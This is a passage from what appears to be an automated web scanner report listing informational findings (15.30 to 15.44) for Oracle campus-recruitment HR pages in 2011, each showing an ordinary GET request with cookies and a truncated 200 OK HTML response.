Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/news.html

Request

GET /campus/HR/news.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/HR/news.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON; _csoot=1318854354624

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:34 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 9157
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.30. https://campus.oracle.com/campus/HR/pak_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/pak_main.html

Request

GET /campus/HR/pak_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:49 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27317
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.31. https://campus.oracle.com/campus/HR/ph_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/ph_main.html

Request

GET /campus/HR/ph_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:49 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27342
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.32. https://campus.oracle.com/campus/HR/sg_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/sg_main.html

Request

GET /campus/HR/sg_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27896
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.33. https://campus.oracle.com/campus/HR/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/sitemap.html

Request

GET /campus/HR/sitemap.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:53 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 15537
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...

15.34. https://campus.oracle.com/campus/HR/thai_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/thai_main.html

Request

GET /campus/HR/thai_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:53 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27333
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.35. https://campus.oracle.com/campus/HR/transition_4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/transition_4.html

Request

GET /campus/HR/transition_4.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:32 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 6063
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.36. https://campus.oracle.com/campus/HR/us-apply_now.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-apply_now.html

Request

GET /campus/HR/us-apply_now.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_current-openings.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; _csoot=1318854988404; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:17 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 3506
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.37. https://campus.oracle.com/campus/HR/us-calendar.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-calendar.jsp

Request

GET /campus/HR/us-calendar.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 167256

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

15.38. https://campus.oracle.com/campus/HR/us-home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-home.html

Request

GET /campus/HR/us-home.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; _csoot=1318854988404; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:26 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 11893
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.39. https://campus.oracle.com/campus/HR/us-internship-global.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-internship-global.html

Request

GET /campus/HR/us-internship-global.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:28:02 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 10045
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.40. https://campus.oracle.com/campus/HR/us-profile-direct.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-direct.jsp

Request

GET /campus/HR/us-profile-direct.jsp?flag=0 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:52 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

15.41. https://campus.oracle.com/campus/HR/us-profile.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile.html

Request

GET /campus/HR/us-profile.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:57 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 2723
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.42. https://campus.oracle.com/campus/HR/us-profile_mobile.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile_mobile.html

Request

GET /campus/HR/us-profile_mobile.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile_redirect.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:50 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 2665
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.43. https://campus.oracle.com/campus/HR/us-profile_mobile_redirect.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile_mobile_redirect.html

Request

GET /campus/HR/us-profile_mobile_redirect.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-home.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:50 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 1588
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.44. https://campus.oracle.com/campus/HR/us-upload-file.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-upload-file.jsp

Request

GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
